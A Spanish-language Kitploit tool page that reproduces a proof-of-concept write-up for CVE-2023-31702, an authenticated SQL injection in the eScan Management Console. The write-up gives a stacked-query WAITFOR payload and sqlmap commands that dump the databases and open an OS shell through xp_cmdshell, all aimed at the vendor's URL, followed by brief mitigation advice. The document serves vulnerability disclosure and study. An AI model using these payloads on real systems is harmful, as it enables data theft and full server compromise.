Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-31702 — CVE-2023-31702 es una vulnerabilidad de inyección SQL autenticada descubierta en MicroWorld Technologies eScan Management Console versión 14.0.1400.2281. | Kitploit
Herramientas/GitHubGitHub/sahiloj/cve-2023-31702
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubsahiloj/cve-2023-31702

CVE-2023-31702

CVE-2023-31702 es una vulnerabilidad de inyección SQL autenticada descubierta en MicroWorld Technologies eScan Management Console versión 14.0.1400.2281.

Ver Repositorio
2111hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-31702 — Inyección SQL en la Consola de Administración de eScan (Autenticada)

CVE Severity Type Auth


Resumen

CVE-2023-31702 es una vulnerabilidad de Inyección SQL autenticada descubierta en MicroWorld Technologies eScan Management Console versión 14.0.1400.2281. La vulnerabilidad existe en el endpoint GetUserCurrentPwd, donde el parámetro UsrId es pasado directamente a una consulta SQL sin la debida sanitización o parametrización. Un atacante autenticado puede explotar esta falla para realizar una inyección SQL ciega basada en tiempo, extraer toda la base de datos backend y, en última instancia, obtener un shell de comandos del sistema operativo interactivo en el Microsoft SQL Server subyacente — lo que lleva al compromiso total del sistema.


Detalles de la Vulnerabilidad

CampoDetalles
CVE IDCVE-2023-31702
Tipo de VulnerabilidadInyección SQL (Ciega Basada en Tiempo / Consultas Apiladas)
Producto AfectadoMicroWorld Technologies eScan Management Console
Versión Afectada14.0.1400.2281
Endpoint Vulnerable/ewconsole/ewconsole.dll/GetUserCurrentPwd
Parámetro VulnerableUsrId
AutenticaciónRequerida (credenciales válidas de la consola)
Probado enWindows
Puntuación CVSS v3.18.8 (Alta)
Vector CVSSAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Fecha de Reporte16 de mayo de 2023
AutorSahil Ojha

Software Afectado

CampoDetalles
ProveedorMicroWorld Technologies
ProductoeScan Management Console
Página del Proveedorhttps://www.escanav.com
Enlace del Softwarehttps://cl.escanav.com/ewconsole.dll
PlataformaWindows

Descripción de la Vulnerabilidad

La Consola de Administración de eScan proporciona una interfaz web para gestionar la seguridad de los endpoints en la red de una organización. La función "Ver Perfil de Usuario" expone un endpoint tipo REST:

/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=<ID>&cnt=<counter>

El parámetro UsrId se incorpora en una consulta SQL del backend sin validación, escape ni uso de consultas parametrizadas. Esto permite que un atacante autenticado inyecte sentencias SQL arbitrarias en la consulta, lo que resulta en:

  • Inyección SQL Ciega Basada en Tiempo — usando WAITFOR DELAY para confirmar explotabilidad.
  • Ejecución de Consultas Apiladas — permitiendo cargas útiles de inyección de múltiples sentencias.
  • Volcado Completo de la Base de Datos — extrayendo todas las tablas, usuarios, credenciales y datos sensibles del backend SQL Server.
  • Ejecución de Comandos del Sistema Operativo — aprovechando el procedimiento almacenado xp_cmdshell de SQL Server (habilitado mediante sp_configure) para ejecutar comandos arbitrarios del sistema operativo en el servidor con los privilegios de la cuenta de servicio de SQL Server.

Impacto

Una explotación exitosa de esta vulnerabilidad permite a un atacante:

  • 🔴 Volcar toda la base de datos de SQL Server, incluyendo credenciales de usuario, datos de configuración e información empresarial sensible.
  • 🔴 Obtener un shell interactivo del sistema operativo en el servidor Windows que aloja la instancia de SQL Server.
  • 🔴 Ejecutar comandos arbitrarios del sistema operativo (por ejemplo, crear cuentas de puerta trasera, exfiltrar datos, pivotear a recursos internos de la red).
  • 🔴 Comprometer completamente el servidor de administración de eScan y potencialmente todos los endpoints que gestiona.

⚠️ Nota: El atacante primero debe obtener credenciales válidas para la Consola de Administración de eScan. Sin embargo, una vez autenticado, la explotación es sencilla y no requiere privilegios elevados de consola.


Prueba de Concepto

Paso 1 — Acceder al Endpoint Vulnerable

Después de autenticarse en la Consola de Administración de eScan, navegue a la siguiente URL:

https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493

Esto devuelve los datos del perfil del usuario actual, confirmando que el endpoint es accesible.

Vulnerable Endpoint


Paso 2 — Confirmar la Inyección SQL con un Payload Basado en Tiempo

Inyecte el siguiente payload de retardo temporal en el parámetro UsrId:

https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR DELAY '0:0:5'--&cnt=4176

Desglose del payload:

  • ; — termina la sentencia SQL original e inicia una nueva (consulta apilada).
  • WAITFOR DELAY '0:0:5' — indica al SQL Server que pause durante 5 segundos antes de responder.
  • -- — comenta el resto de la consulta original para evitar errores de sintaxis.

Si la respuesta del servidor se retrasa aproximadamente 5 segundos, la inyección se confirma.

Time-Based Injection Confirmed


Paso 3 — Volcar Bases de Datos Usando SQLMap

Una vez confirmada la inyección SQL ciega, se puede extraer toda la base de datos usando SQLMap:

sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --dbs \
  --batch

Esto enumera todas las bases de datos alojadas en el SQL Server backend.


Paso 4 — Obtener un Shell del SO a través de SQLMap

SQLMap también puede escalar el ataque a la ejecución de comandos a nivel de SO habilitando y aprovechando xp_cmdshell:

sqlmap -u "https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=5493" \
  --cookie="<session_cookie>" \
  --dbms=mssql \
  --os-shell \
  --batch

Esto establece un shell interactivo del SO en el host de SQL Server.

Obtaining OS Shell via SQLMap


Paso 5 — Ejecutar Comandos del SO en el Servidor

Con el shell del SO establecido, se pueden ejecutar comandos arbitrarios de Windows en el servidor:

Executing OS Commands


Mitigación

Se recomiendan encarecidamente las siguientes medidas para remediar y mitigar esta vulnerabilidad:

  1. Usar Consultas Parametrizadas / Sentencias Preparadas — Nunca concatenar la entrada del usuario directamente en consultas SQL. Usar parámetros vinculados para separar los datos de la lógica de la consulta.
Descargar herramienta